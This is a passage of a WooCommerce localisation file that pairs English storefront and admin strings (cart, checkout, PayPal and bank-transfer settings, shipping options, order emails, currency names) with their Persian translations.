invalid and cannot be paid for.'=>'متاسفانه این سفارش نامعتبر است و اجازه پرداخت ندارید.','Log in'=>'ورود','Text'=>'متن','This product is protected and cannot be purchased.'=>'این محصول محافظت شده است و شما قادر به پرداخت نیستید.','and'=>'و','[Remove]'=>'[حذف]',' – Page %s'=>' – برگه %s','Place order'=>'ثبت سفارش','Choose an option'=>'یک گزینه را انتخاب کنید','Please provide a valid account username.'=>'لطفا یک نام کاربری معتبر برای حساب کاربری فراهم کنید.','Active'=>'فعال','Paused'=>'متوقف شد','Disabled'=>'غیرفعال شد','Cart'=>'سبد خرید','Hide if cart is empty'=>'اگر سبد خرید خالی بود مخفی شود','Remove filter'=>'پاک کردن فیلتر','Attribute'=>'خاصیت','Query type'=>'نوع جستجو','AND'=>'و','Any %s'=>'هر %s','Min price'=>'حداقل قیمت','Show as dropdown'=>'به صورت دراپ داون نشان بده','Show product counts'=>'نمایش شمارگان محصول','Show hierarchy'=>'سلسله مراتب را نشان بده','No product categories exist.'=>'هیچ محصولی در این دسته وجود ندارد.','Number of products to show'=>'تعداد محصولات برای نمایش','Random'=>'تصادفی','ASC'=>'صعودی','DESC'=>'نزولی','Hide free products'=>'مخفی کردن محصولات رایگان','Show hidden products'=>'نمایش محصولات مخفی','Logged in as %s'=>'وارد شده با %s','Approve'=>'تایید','Username or email address'=>'نام کاربری یا آدرس ایمیل','Password'=>'گذرواژه','Your cart is currently empty.'=>'سبد خرید شما در حال حاضر خالی است.','Quantity'=>'تعداد','Your order'=>'سفارش شما','Click here to enter your code'=>'برای نوشتن کد اینجا کلیک کنید','Click here to login'=>'برای ورود اینجا را کلیک کنید','Payment'=>'پرداخت','Pay for order'=>'پرداخت برای سفارش','Update totals'=>'به روز رسانی جمع کل','Username: %s'=>'نام کاربری: %s','Click here to reset your password'=>'برای ریست کردن گذرواژه خود اینجا را کلیک کنید','Billing address'=>'آدرس صورتحساب','Remember me'=>'مرا به خاطر بسپار','Lost your password?'=>'گذرواژه خود را فراموش کرده اید؟','No products were found matching your selection.'=>'هیچ محصولی یافت نشد.','Email address'=>'آدرس ایمیل','Register'=>'عضویت','New password'=>'گذرواژه جدید','Re-enter new password'=>'تکرار گذرواژه جدید','Item name in quotes“%s”'=>'“%s”','breadcrumbHome'=>'خانه','Save address'=>'ذخیره آدرس','New password (leave blank to leave unchanged)'=>'گذرواژه جدید (در صورتی که قصد تغییر ندارید خالی بگذارید)','Current password (leave blank to leave unchanged)'=>'گذرواژه پیشین (در صورتی که قصد تغییر ندارید خالی بگذارید)','Password change'=>'تغییر گذرواژه','Cart totals'=>'جمع کل سبد خرید','Application authentication request'=>'درخواست تأیید اعتبار برنامه','Top rated products'=>'پر امتیازترین محصولات','Recent reviews'=>'آخرین دیدگاه‌ها','On-sale products'=>'محصولات در فروش ویژه','Featured products'=>'محصولات برجسته','All products'=>'همه محصولات','Category order'=>'دسته‌بندی سفارش','Active filters'=>'فیلترهای فعال','Search results: “%s”'=>'نتیجه جستجو “%s”','Order fully refunded'=>'استرداد کامل سفارش','The order totals have been updated. Please confirm your order by pressing the "Place order" button at the bottom of the page.'=>'مجموع سفارش به روز شده است. در صورتیکه مورد تایید است دکمه " قرار دادن سفارش " را در پایین برگه فشار دهید.','IP Address'=>'آدرس IP','Sorting orderOrder'=>'ترتیب','Filter'=>'فیلتر','Confirm new password'=>'تکرار گذرواژه جدید','There are some issues with the items in your cart. Please go back to the cart page and resolve these issues before checking out.'=>'مشکلاتی در اقلام سبد خرید شما وجود دارد. خواهشمندیم به برگه سبد خرید بازگشته و پیش از پرداخت این مشکلات را رفع کنید.','Number of reviews to show'=>'تعداد نقد و بررسی‌ها (دیدگاه‌ها) برای نمایش','Date:'=>'تاریخ:','To connect to %1$s you need to be logged in. Log in to your store below, or cancel and return to %1$s'=>'برای اتصال به %1$s شما نیاز به ورود دارید. ورود به فروشگاه شما از طریق زیر یا لغو و بازگشت به %1$s','You must be logged in to checkout.'=>'برای پرداخت باید وارد شوید.','Lost your password? Please enter your username or email address. You will receive a link to create a new password via email.'=>'گذرواژه خود را فراموش کرده اید؟ نام کاربری یا ایمیل خود را وارد کنید. یک لینک برای ساختن گذرواژه جدید در ایمیل خود دریافت خواهید کرد.','Coupon:'=>'کدتخفیف:','Have a coupon?'=>'کد تخفیف دارید؟','Sort by price: low to high'=>'مرتب‌سازی بر اساس ارزانترین','Sort by average rating'=>'مرتب‌سازی بر اساس امتیاز','Sort by price: high to low'=>'مرتب‌سازی بر اساس گرانترین','Sort by popularity'=>'مرتب‌سازی بر اساس محبوبیت','Thank you. Your order has been received.'=>'متشکریم، سفارش شما دریافت شد.','Create an account?'=>'می خواهید یک حساب کاربری ایجاد کنید؟','%s would like to connect to your store'=>'%s می‌خواهد به فروشگاه شما متصل شود','edit-address-slugshipping'=>'حمل و نقل','edit-address-slugbilling'=>'صورت حساب','Invalid username or email.'=>'نام کاربری یا گذرواژه صحیح نیست.','Enter a username or email address.'=>'نام کاربری یا پست الکترونیک را وارد کنید.','This order’s status is “%s”—it cannot be paid for. Please contact us if you need assistance.'=>'این سفارش در وضعیت "%s" می باشد و امکان پرداخت وجود ندارد. اگر کمک نیاز دارید لطفا با ما تماس بگیرید.','Returning customer?'=>'قبلا ثبت نام کرده‌اید؟','If you have shopped with us before, please enter your details below. If you are a new customer, please proceed to the Billing section.'=>'اگر قبلا از ما خرید کرده اید، لطفا جزییات را در کادرهای پایین وارد نمائید. اگر یک مشتری جدید هستید، لطفا بخش صورت حساب را ادامه دهید.','Billing Address 2'=>'ادامۀ آدرس صورتحساب','Shipping Address 2'=>'ادامۀ آدرس حمل و نقل','Apply coupon'=>'اعمال کدتخفیف','A list or dropdown of product categories.'=>'یک لیست یا کشویی از دسته‌های محصول.','Additional information'=>'توضیحات تکمیلی','Sale!'=>'تخفیف!','Subtotal'=>'جمع جزء','Sorry, it seems that there are no available payment methods. Please contact us if you require assistance or wish to make alternate arrangements.'=>'با عرض پوزش، به نظر می‌رسد هیچ روش پرداختی موجود نیست. اگر به کمک نیاز دارید یا می‌خواهید ترتیبات دیگری را انجام دهید، لطفا با ما تماس بگیرید.','Showing the single result'=>'در حال نمایش یک نتیجه','Proceed to checkout'=>'ادامه جهت تسویه حساب','Return to cart'=>'بازگشت به سبد خرید','Update cart'=>'بروزرسانی سبد خرید','Order – %s'=>'سفارش – %s','Continue shopping'=>'ادامه خرید','My account'=>'حساب کاربری من','Checkout'=>'تسویه حساب','View order: %s'=>'مشاهده سفارش: %s','Shipping address'=>'آدرس حمل و نقل','Calculate shipping'=>'محاسبه حمل و نقل','No products in the cart.'=>'هیچ محصولی در سبد خرید نیست.','Sales'=>'فروش ویژه','Price:'=>'قیمت:','Max price'=>'حداکثر قیمت','OR'=>'یا','Ship to a different address?'=>'حمل و نقل به یک آدرس متفاوت؟','Billing & Shipping'=>'صورت حساب و حمل و نقل','Free shipping coupon'=>'کد تخفیف حمل و نقل رایگان','Only show children of the current category'=>'فقط زیرمجموعه‌های دسته فعلی را نمایش بده','Select a category'=>'یک دسته انتخاب نمایید','Order number:'=>'شماره سفارش:','Use a new payment method'=>'افزودن یک روش پرداخت جدید','Reviews (%d)'=>'نظرات (%d)','Recently Viewed Products'=>'آخرین محصولات نمایش شده در ووکامرس','Username or email'=>'نام کاربری یا ایمیل','Refund – %s'=>'مسترد – %s','Filter by price'=>'فیلتر بر اساس قیمت','List'=>'فهرست','Enter a new password below.'=>'گذرواژه جدید را بنویسید.','To set your password, visit the following address: '=>'برای تنظیم رمز ورود خود، به آدرس زیر مراجعه کنید: ','Since your browser does not support JavaScript, or it is disabled, please ensure you click the %1$sUpdate Totals%2$s button before placing your order. You may be charged more than the amount stated above if you fail to do so.'=>'به دلیل اینکه مرورگر شما جاوا اسکریپت را پشتیبانی نمی کند ، یا غیر فعال است ، لطفا کلیک کنید روی %1$sبروزرسانی جمع %2$s قبل از اینکه سفارش خود را ثبت کنید.در صورتیکه این کار را نکنید ممکن است مبلغ قابل پرداخت شما بیش از چیزی که در بالا مشخص شده است باشد.','Please fill in your details above to see available payment methods.'=>'خواهشمندیم مشخصات خود را در بالا وارد کنید تا روش‌های موجود برای پرداخت را نمایش کنید.','Sorry, it seems that there are no available payment methods for your location. Please contact us if you require assistance or wish to make alternate arrangements.'=>'متاسفانه به نظر می رسد در حال حاضر هیچ روش پرداختی برای مکانی که انتخاب کرده اید موجود نمی باشد. در صورتیکه نیاز به کمک داشتید با ما تماس بگیرید.','You may be interested in…'=>'ممکن است علاقه‌مند باشید به;','Deny'=>'انصراف','An account is already registered with that username. Please choose another.'=>'قبلا این نام کاربری ثبت شده است. خواهشمندیم یک نام کاربری دیگر انتخاب کنید.','Unpaid order cancelled - time limit reached.'=>'سفارش پرداخت نشده لغو شد - حد زمانی پایان یافت.','This function should not be called before woocommerce_init.'=>'این تابع نباید قبل از woocommerce_init فراخوانی شود.','Egyptian pound'=>'Egyptian pound','Ukrainian hryvnia'=>'Ukrainian hryvnia','Turkish lira'=>'Turkish lira','Thai baht'=>'Thai baht','Swiss franc'=>'Swiss franc','Swedish krona'=>'Swedish krona','South African rand'=>'South African rand','Singapore dollar'=>'Singapore dollar','Russian ruble'=>'Russian ruble','Romanian leu'=>'Romanian leu','Pound sterling'=>'Pound sterling','Philippine peso'=>'Philippine peso','New Zealand dollar'=>'New Zealand dollar','Norwegian krone'=>'Norwegian krone','Nigerian naira'=>'Nigerian naira','Mexican peso'=>'Mexican peso','Malaysian ringgit'=>'Malaysian ringgit','South Korean won'=>'South Korean won','Lao kip'=>'Lao kip','Japanese yen'=>'Japanese yen','Indian rupee'=>'Indian rupee','Indonesian rupiah'=>'Indonesian rupiah','Hungarian forint'=>'Hungarian forint','Croatian kuna'=>'Croatian kuna','Hong Kong dollar'=>'Hong Kong dollar','Dominican peso'=>'Dominican peso','Danish krone'=>'Danish krone','Czech koruna'=>'Czech koruna','Colombian peso'=>'Colombian peso','Chinese yuan'=>'Chinese yuan','Chilean peso'=>'Chilean peso','Canadian dollar'=>'Canadian dollar','Bulgarian lev'=>'Bulgarian lev','Brazilian real'=>'Brazilian real','Bangladeshi taka'=>'Bangladeshi taka','Australian dollar'=>'Australian dollar','Argentine peso'=>'Argentine peso','United Arab Emirates dirham'=>'United Arab Emirates dirham','Please enter a valid order ID'=>'خواهشمندیم یک کد سفارش معتبر وارد کنید','Password reset is not allowed for this user'=>'ریست گذرواژه برای این کاربر مجاز نیست','The following addresses will be used on the checkout page by default.'=>'آدرس‌های زیر به طور پیشفرض در صفحه پرداخت مورد استفاده قرار می‌گیرد.','Default sorting'=>'مرتب‌سازی پیشفرض','%s has been added to your cart.'=>'%s به سبد خرید شما اضافه شد.','Showing all %1$d result'=>'نمایش همه %1$d نتیجه','Dropdown'=>'کشویی','sluguncategorized'=>'uncategorized','Filter by'=>'صافی براساس','A WooCommerce product.'=>'یک محصول ووکامرس','Quantity: %d'=>'تعداد: %d','Order #%s'=>'سفارش #%s','Enable/Disable'=>'فعال/غیرفعال','Enable this email notification'=>'فعال سازی اطلاع رسانی از طریق ایمیل','Recipient(s)'=>'گیرنده','Email type'=>'نوع ایمیل','New account'=>'حساب کاربری جدید','Welcome to {site_title}'=>'به {site_title} خوش آمدید','Thank you for your order'=>'از خرید شما متشکریم','Refunded order'=>'سفارش برگشت خورده','Reset password'=>'بازگردانی گذرواژه','New order'=>'سفارش جدید','Plain text'=>'متن ساده','HTML'=>'HTML','Multipart'=>'چند بخشی','HTML template'=>'الگوی HTML','Plain text template'=>'الگوی متنی ساده','Delete template file'=>'پاک کردن فایل الگو','View template'=>'دیدن الگو','Hide template'=>'مخفی کردن الگو','Title'=>'عنوان','Instructions'=>'دستورالعمل‌ها','BIC'=>'BIC','BSB'=>'BSB','IFSC'=>'IFSC','Proceed to PayPal'=>'انتقال به پی پال','PayPal'=>'پی‌پال','IPN payment completed'=>'پرداخت IPN تکمیل شد','Payment %s via IPN.'=>'پرداخت %s از طریق IPN.','PDT payment completed'=>'پرداخت PDTتکمیل شد','Pay via PayPal; you can pay with your credit card if you don\'t have a PayPal account.'=>'پرداخت از راه پی‌پال، اگر حساب کاربری پی‌پال ندارید، می توانید با کارت اعتباری پرداخت کنید.','Enable PayPal sandbox'=>'فعال کردن سندباکس پی‌پال','Enable logging'=>'فعال کردن گزارش گیری','Choose whether you wish to capture funds immediately or authorize payment only.'=>'انتخاب کنید که آیا شما مایل به گرفتن بودجه هستید و یا فقط اجازه پرداخت می دهید.','Capture'=>'گرفتن','Authorize'=>'اجازه دادن','Credit card'=>'کارت اعتباری','All allowed countries'=>'تمام کشورهای مجاز','Users will need to spend this amount to get free shipping (if enabled above).'=>'کاربران ملزم به هزینه کردن این مقدار هستند تا حمل و نقل رایگان بدست بیاورند (اگر فعال کنید)','Selected countries'=>'کشور‌های منتخب','Excluding selected countries'=>'به جز کشور‌های انتخاب شده','Enable'=>'فعال','Fixed amount'=>'مقدار ثابت','Percentage of cart total'=>'درصد از کل سبد خرید','Fixed amount per product'=>'مقدار ثابت از هر محصول','Supports the following placeholders: [qty] = number of items, [cost] = cost of items, [fee percent="10" min_fee="20"] = Percentage based fee.'=>'جانگهدارهای زیر پشتیبانی می شود: [qty] = تعداد محصول، [cost] = قیمت محصولات، [fee percent="10" min_fee="20"] = درصد هزینه.','Delivery fee'=>'هزینه تحویل','Fee type'=>'روش پرداخت','Minimum order amount'=>'حداقل مبلغ سفارش','Option name | Additional cost [+- Percents%] | Per cost type (order, class, or item)'=>'نام انتخاب | هزینه اضافی | در هر نوع هزینه (سفارش، کلاس یا آیتم)','Calculation type'=>'نوع محاسبه','"%s" shipping class cost'=>'"%s" هزینه کلاس حمل و نقل','Flat rate'=>'نرخ ثابت','API credentials'=>'مدارک API','Address override'=>'بازنویسی آدرس','Invoice prefix'=>'پیش فاکتور','Receiver email'=>'ایمیل دریافت کننده','Debug log'=>'گزارش عیب یابی','PayPal sandbox'=>'سندباکس پی‌پال','Enable PayPal Standard'=>'فعال کردن پی پال استاندارد','PayPal acceptance mark'=>'نشانه گذاری پذیرش پی پال','Enable check payments'=>'فعال کردن پرداخت از طریق چک','Branch code'=>'کد شعبه','Bank code'=>'کد بانک','Bank transit number'=>'شماره تراکنش بانک','Our bank details'=>'مشخصات بانکی ما','+ Add account'=>'+ افزودن حساب','Bank name'=>'نام بانک','Account number'=>'شماره کارت','Account name'=>'نام حساب','Sort code'=>'شماره حساب','Direct bank transfer'=>'انتقال مستقیم بانکی','Enable bank transfer'=>'فعال کردن خرید از طریق انتقال به کارت یا حساب','Partial refund email heading'=>'سربرگ ایمیل بازپرداخت جزئی','Full refund email heading'=>'سربرگ ایمیل بازپرداخت کامل','Partial refund subject'=>'موضوع بازپرداخت جزئی','Full refund subject'=>'موضوع بازپرداخت کامل','Partially refunded order'=>'سفارش جزئی بازپرداخت‌شده','Email heading (paid)'=>'سربرگ ایمیل (پرداخت)','Email heading'=>'سربرگ ایمیل','Make your payment directly into our bank account. Please use your Order ID as the payment reference. Your order will not be shipped until the funds have cleared in our account.'=>'پرداخت خود را مستقیما به حساب بانکی ما واریز کنید.خواهشمندیم شماره سفارش خود را بعنوان کد ارجاع پرداخت استفاده کنید.سفارش شما تا زمانی که وجوه به حساب ما وارد نشود ارسال نخواهد شد.','Order refunded emails are sent to customers when their orders are refunded.'=>'ایمیل‌های سفارش بازپرداخت‌شده هنگامی که سفارشی بازپرداختی برچسب خورد به مشتریان فرستاده شود.','IBAN'=>'شماره شبا','Completed order'=>'سفارش‌های تکمیل شده','[Order #%s]'=>'(سفارش #%s)','Your {site_title} order #{order_number} has been partially refunded'=>'بخشی از هزینه سفارش #{order_number} شما از {site_title} برگشت داده شده است','Your {site_title} order #{order_number} has been refunded'=>'هزینه سفارش #{order_number} شما از {site_title} برگشت داده شده است','Instructions that will be added to the thank you page and emails.'=>'دستور العمل‌ها در برگه تشکر و ایمیل‌ها افزوده می شود.','Order #%1$s has had a reversal cancelled. Please check the status of payment and update the order status accordingly here: %2$s'=>'درخواست برگشت سفارش #%1$s لغو شده است. لطفا وضعیت پرداخت را بررسی کرده و وضعیت سفارش را بر این اساس به روز رسانی نمایید: %2$s','Payment pending (%s).'=>'در انتظار پرداخت (%s).','Could not write to template file.'=>'در فایل الگو نمی توانید بنویسید.','Validation error: PayPal amounts do not match (amt %s).'=>'خطای معتبرسازی: مقادیر پی‌پال همخوانی ندارند. (amt %s)','Payment method description that the customer will see on your website.'=>'توضیحات پرداخت برای خریدار در هنگام انتخاب درگاه نمایش داده می‌شود.','Optionally enable "Payment Data Transfer" (Profile > Profile and Settings > My Selling Tools > Website Preferences) and then copy your identity token here. This will allow payments to be verified without the need for PayPal IPN.'=>'برای فعال کردن "انتقال داده‌های پرداخت" به (پروفایل > پروفایل و تنظیمات > ابزار فروش من > عملکرد وب سایت) رفته و رمز هویت را در اینجا کپی کنید. اینکار اجازه پرداخت تایید شده بدون نیاز به IPN پی پال را خواهد داد.','Reversal cancelled for order #%s'=>'برگشت‌های لغو شده برای سفارش %s','If your main PayPal email differs from the PayPal email entered above, input your main receiver email for your PayPal account here. This is used to validate IPN requests.'=>'اگر ایمیل اصلی PayPal شما متفاوت از ایمیل PayPal وارد شده در بالا است، ایمیل دریافت کننده اصلی تان را برای حساب کاربری PayPal در اینجا وارد نمائید. این جهت معتبرسازی درخواست‌های IPN استفاده شده است.','If COD is only available for certain methods, set it up here. Leave blank to enable for all methods.'=>'اگر می خواهید پرداخت هنگام تحویل فقط در موارد خاصی فعال باشد، از اینجا تنظیمات آن را انجام دهید. اگر خالی بگذارید، برای تمام روش‌ها اعمال می شود.','This template has been overridden by your theme and can be found in: %s.'=>'این الگو در پوسته شما بازنویسی شده است و می توانید آن را پیدا کنید در: %s.','This is an order notification sent to customers containing order details after payment.'=>'این آگهی بعد از پرداخت برای خریدار ارسال می شود و حاوی جزئیات سفارش است.','These rates are extra shipping options with additional costs (based on the flat rate).'=>'این نرخ‌ها، گزینه‌های افزوده بر حمل و نقل هستند با هزینه‌های افزوده (بر اساس نرخ ثابت).','Order complete emails are sent to customers when their orders are marked completed and usually indicate that their orders have been shipped.'=>'ایمیل‌های سفارشات تکمیل شده، وقتی که سفارش آنها برچسب تکمیل شده دریافت می کند ارسال می شود، و معمولا به معنی ارسال شدن سفارش آنها است.','New order emails are sent to chosen recipient(s) when a new order is received.'=>'ایمیل سفارش جدید به گیرنده(های) منتخب هنگامی ارسال می شود که یک سفارش جدید دریافت شود.','Select shipping methods'=>'انتخاب روش‌های حمل و نقل','Select some countries'=>'انتخاب برخی از کشور‌ها','Select options'=>'انتخاب گزینه‌ها','Choose which format of email to send.'=>'انتخاب کنید چه نوع ساختاری برای ایمیل فرستاده شده استفاده شود.','Are you sure you want to delete this template file?'=>'آیا مطمئنید که می خواهید این فایل الگو را پاک کنید؟','Advanced options'=>'گزینه‌های پیشرفته','Note added to your {site_title} order from {order_date}'=>'یادداشت شما به سفارش {order_date} از {site_title} اضافه شد.','Enter a cost (excl. tax) or sum, e.g. 10.00 * [qty].'=>'وارد کردن مبلغ (بدون مالیات) یا میانگین، مثال: 10.00 * [تعداد].','One per line: Option name | Additional cost [+- Percents] | Per cost type (order, class, or item) Example: Priority mail | 6.95 [+ 0.2%] | order.'=>'هر خط یکی: نام گزینه | هزینه‌های افزوده [+- درصد] | در هر چگونگی هزینه (سفارش, رده, یا عنوان) نمونه: پست پیشتاز | 6.95 [+ 0.2%] | سفارش.','Additional rates'=>'نرخ‌های اضافی','How to calculate delivery charges'=>'چگونه هزینه‌های تحویل را محاسبه کنید','Branch sort'=>'مرتب‌سازی بر اساس شعبه','Please send a check to Store Name, Store Street, Store Town, Store State / County, Store Postcode.'=>'لطفا چک خود را به نام فروشگاه، خیابان فروشگاه، شهر فروشگاه، ایالت/کشور فروشگاه، کدپستی فروشگاه بفرستید.','Enable for shipping methods'=>'فعال کردن روش‌های حمل و نقل','Template file copied to theme.'=>'فایل الگو در پوسته کپی شد.','Template file deleted from theme.'=>'فایل الگو از پوسته پاک شد.','No shipping class cost'=>'هزینه کلاس حمل و نقل وجود ندارد.','Enter your PayPal API credentials to process refunds via PayPal. Learn how to access your PayPal API Credentials.'=>'PayPal API برای بازپرداخت وارد کنید از طریق پی پال، اطلاع از چگونگی دسترسی شما به PayPal API Credentials.','Please enter your PayPal email address; this is needed in order to take payment.'=>'خواهشمندیم ایمیل پی پال خود را وارد کنید. این کار برای پرداخت لازم است.','Please enter a prefix for your invoice numbers. If you use your PayPal account for multiple stores ensure this prefix is unique as PayPal will not allow orders with the same invoice number.'=>'خواهشمندیم پیشوند برای شماره فاکتور خود را وارد کنید. اگر شما استفاده از حساب پی پال خود را برای فروشگاه‌های مختلف استفاده می کنید، مطمئن شوید این پیشوند منحصر به فرد است در غیر اینصورت پی پال سفارشات را با شماره صورتحساب درج شده را اجازه نمی دهد.','PayPal email'=>'ایمیل پی پال','Order #%1$s has been marked as refunded - PayPal reason code: %2$s'=>'سفارش #%1$s به عنوان بازپرداختی برچسب خورد - کد علت پی پال: %2$s','Validation error: PayPal IPN response from a different email address (%s).'=>'خطای معتبرسازی: مقادیر پی پال همخوانی ندارند. (%s)','Validation error: PayPal amounts do not match (gross %s).'=>'خطای معتبرسازی: مقادیر پی پال همخوانی ندارند. (gross %s)','Validation error: PayPal currencies do not match (code %s).'=>'خطای معتبرسازی: مقادیر پی پال همخوانی ندارند. (کد %s)','Failed order emails are sent to chosen recipient(s) when orders have been marked failed (if they were previously pending or on-hold).'=>'ایمیل سفارش‌های ناموفق به گیرندگان منتخب هنگامی فرستاده خواهند شد که سفارش‌ها ناموفق علامتگذاری شده باشند (اگر آن‌ها پیش از این در وضعیت در حال انجام و یا در انتظار بررسی بوده باشند).','PayPal Standard does not support your store currency.'=>'پی‌پال واحد پول فروشگاه شما را قبول نمی کند.','Availability'=>'موجودی','A valid free shipping coupon'=>'کدتخفیف ارسال رایگان','A minimum order amount AND a coupon'=>'حداقل مبلغ سفارش و کدتخفیف','A minimum order amount OR a coupon'=>'حداقل مبلغ سفارش یا کدتخفیف','Cancelled order'=>'سفارش لغو شده','Allowed ZIP/post codes'=>'کدهای پستی مجاز','PayPal identity token'=>'نشانه (Token) شناسایی PayPal','Gateway disabled'=>'درگاه غیرفعال شده است','Free shipping requires...'=>'حمل و نقل رایگان نیازمند موارد زیر است...','Per class: Charge shipping for each shipping class individually'=>'برای هر کلاس: هزینه حمل و نقل برای هر کلاس حمل و نقل به صورت جداگانه','Shipping class costs'=>'مبالغ کلاس حمل و نقل','Method availability'=>'در دسترس بودن روش','Per order: Charge shipping for the most expensive shipping class'=>'برای هر سفارش: هزینه حمل و نقل برای گرانترین کلاس حمل و نقل','These costs can optionally be added based on the product shipping class.'=>'این مبالغ می توانند به صورت اختیاری بر اساس کلاس حمل و نقل محصول افزوده شوند.','Shipping costs updated.'=>'مبلغ حمل و نقل بروزرسانی شد.','Remove selected account(s)'=>'حذف حساب(های) انتخاب شده','Processing order'=>'سفارش در حال انجام','Method title'=>'عنوان روش','Payment action'=>'عملیات پرداخت','Order #%1$s has been marked on-hold due to a reversal - PayPal reason code: %2$s'=>'سفارش #%1$s به عنوان در انتظار به دلیل بازگشت برچسب خورد - کد علت پی‌پال: %2$s','Refunded %1$s - Refund ID: %2$s'=>'مسترد شده %1$s - شناسه استرداد: %2$s','Account details'=>'جزئیات حساب','BIC / Swift'=>'BIC / سوئیفت','Accept for virtual orders'=>'فعال برای سفارشات مجازی','Payment for order %s reversed'=>'پرداخت برای سفارش %s بازگشت خورده','Shipping via %s'=>'ارسال از طریق %s','Subject'=>'موضوع ایمیل','Order detail emails can be sent to customers containing their order information and payment links.'=>'ایمیل‌های جزئیات سفارش را می‌توان برای مشتریان ارسال کرد که حاوی اطلاعات سفارش و پیوندهای پرداخت آنها است.','File was not found.'=>'فایل پیدا نشد.','Customer note emails are sent when you add a note to an order.'=>'ایمیل‌های یادداشت خریدار وقتی شما یک یادداشت به سفارش اضافه کنید، فرستاده خواهند شد.','Customer note'=>'یادداشت خریدار','Payment method description that the customer will see on your checkout.'=>'توضیحات پرداخت که برای خریدار هنگام انتخاب روش پرداخت نمایش داده می‌شود.','Copy file to theme'=>'کپی فايل در پوسته','What ZIP/post codes are available for local pickup?'=>'چه کدهای پستی‌ای برای دریافت حضوری در دسترس هستند؟','Get your API credentials from PayPal.'=>'دریافت اعتبارهای API شما از پی پال.','Send shipping details to PayPal instead of billing.'=>'ارسال جزئیات حمل و نقل بجای صورت حساب به پی پال.','This controls the description which the user sees during checkout.'=>'این کنترل‌ها مشخص میکنند که کاربر طی فرایند پرداخت چه چیزهایی میبیند.','Separate codes with a comma. Accepts wildcards, e.g. P* will match a postcode of PE30. Also accepts a pattern, e.g. NG1___ would match NG1 1AA but not NG10 1AA'=>'کدها با یک کاما از هم جدا می شوند. با نویسه‌های عام تایید می شوند. نمونه P* یکسان خواهد شد با کدپستی از PE30. همچنین با الگو نیز تایید می شوند. نمونه NG1___ یکسان می شود با NG1 1AA ولی با NG10 1AA یکسان نمی شود','Payment to be made upon delivery.'=>'پرداخت پس از تحویل.','Accept COD if the order is virtual'=>'پذیرش پرداخت هنگام تحویل اگر سفارش مجازی است','Instructions that will be added to the thank you page.'=>'توضیحات در برگه تشکر، بعد از پرداخت.','Pay with cash upon delivery.'=>'پرداخت نقدی پس از تحویل.','Routing number'=>'شماره مسیریابی','This controls the title which the user sees during checkout.'=>'این کنترل‌ها مشخص می کنند که کاربر طی فرایند پرداخت چه چیزهایی می بیند.','A note has been added to your order'=>'یک یادداشت به سفارش شما اضافه شد','Enter recipients (comma separated) for this email. Defaults to %s.'=>'گیرندگان ایمیل را وارد کنید (جداسازی با کاما). به طور پیشفرض %s.','Failed (%s)'=>'ناموفق (%s)','What ZIP/post codes are available for local delivery?'=>'چه کد پستی‌هایی برای تحویل محلی در دسترس هستند؟','What fee do you want to charge for local delivery, disregarded if you choose free. Leave blank to disable.'=>'برای تحویل محلی چه هزینه‌ای می‌خواهید دریافت کنید، در صورت انتخاب رایگان، این هزینه لحاظ نمی‌شود. برای غیرفعال کردن، خالی بگذارید.','Invalid refund amount'=>'مبلغ استرداد نادرست است','Description is missing.'=>'توضیحات گم شده اند.','User is missing.'=>'کاربر گم شده است.','API Key updated successfully.'=>'کلید API بخوبی بروزرسانی شد.','Dismiss this notice.'=>'پنهان کردن این آگهی.','View customers'=>'نمایش خریداران','View products'=>'نمایش محصولات','Create customers'=>'ساخت خریدارها','Create products'=>'ساخت محصولات','View and manage customers'=>'نمایش و مدیریت خریداران','View and manage products'=>'نمایش و مدیریت محصولات','Invalid scope %s'=>'گستره نامعتبر %s','Invalid nonce verification'=>'راستی آزمایی کنونی نادرست است','Error 404'=>'404 یافت نشد','Author: %s'=>'نویسنده: %s','Search results for “%s”'=>'نتیجه جستجو برای “%s”','Page %d'=>'برگه %d','An item which is no longer available was removed from your cart.'=>'این ایتم دیگر در دسترس نیست و از سبد خرید شما حذف گردید.','You cannot add "%s" to the cart because the product is out of stock.'=>'شما نمی توانید "%s" را به سبد خرید خود اضافه کنید، این محصول در انبار موجود نیست.','VAT'=>'مالیات بر ارزش افزوده','(incl. VAT)'=>'(شامل مالیات بر ارزش افزوده)','(incl. tax)'=>'(شامل مالیات)','Town / City'=>'شهر','Suburb'=>'حومه','District'=>'منطقه','Province'=>'استان','Canton'=>'بخش','Region'=>'منطقه','Town / District'=>'شهر / ناحیه','County'=>'شهرستان','Municipality'=>'شهرداری','Email Address'=>'آدرس ایمیل','Login'=>'ورود','Note'=>'یادداشت','Product low in stock'=>'کمبود محصول در انبار','Product out of stock'=>'محصول موجود نیست','Address changed successfully.'=>'آدرس با موفقیت تغییر یافت.','Please provide a valid email address.'=>'خواهشمندیم یک آدرس ایمیل معتبر وارد کنید.','Your order was cancelled.'=>'سفارش شما لغو شد.','Error'=>'خطا','required'=>'ضروری','Search %s'=>'جستجو %s','All %s'=>'همه %s','Parent %s'=>'والد %s','Parent %s:'=>'والد %s:','Edit %s'=>'ویرایش %s','New %s'=>'%s جدید','Use as product image'=>'بکارگیری به عنوان عکس محصول','Refunds'=>'استردادها','Admin menu nameCategories'=>'دسته‌بندی‌ها','Admin menu nameProducts'=>'محصولات','Order statusProcessing'=>'در حال انجام','Order statusCompleted'=>'تکمیل شده','Order statusCancelled'=>'لغو شده','Order statusRefunded'=>'مسترد شده','Order statusFailed'=>'ناموفق','Order statusOn hold'=>'در انتظار بررسی','Order statusPending payment'=>'در انتظار پرداخت','No orders found'=>'سفارشی یافت نشد','Edit order'=>'ویرایش سفارش','Add new order'=>'افزودن سفارش جدید','Add order'=>'افزودن سفارش','Product image'=>'تصویر محصول','No products found in trash'=>'محصولی در زباله‌دان پیدا نشد','No products found'=>'محصولی یافت نشد','Search products'=>'جستجوی محصولات','View product'=>'نمایش محصول','New product'=>'محصول جدید','Edit product'=>'ویرایش محصول','Add new product'=>'افزودن محصول جدید','Add new %s'=>'افزودن %s تازه','Edit shipping class'=>'ویرایش کلاس حمل و نقل','Admin menu nameShipping classes'=>'کلاس‌های حمل و نقل','API docs'=>'اسناد API','View WooCommerce API docs'=>'نمایش اسناد API ووکامرس','View WooCommerce documentation'=>'نمایش اسناد ووکامرس','View WooCommerce settings'=>'نمایش پیکربندی ووکامرس','Product backorder'=>'پیش‌خرید محصول','Company name'=>'نام شرکت','Item #%1$s stock increased from %2$s to %3$s.'=>'مورد #%1$s موجودی انبار افزایش یافت از%2$s به %3$s.','Product tags'=>'برچسب محصولات','Parent product'=>'محصول وارد','Parent shipping class:'=>'کلاس حمل و نقل والد:','View and manage orders and sales reports'=>'نمایش و مدیریت سفارش‌ها و گزارش فروش‌ها','Search orders'=>'جستجوی 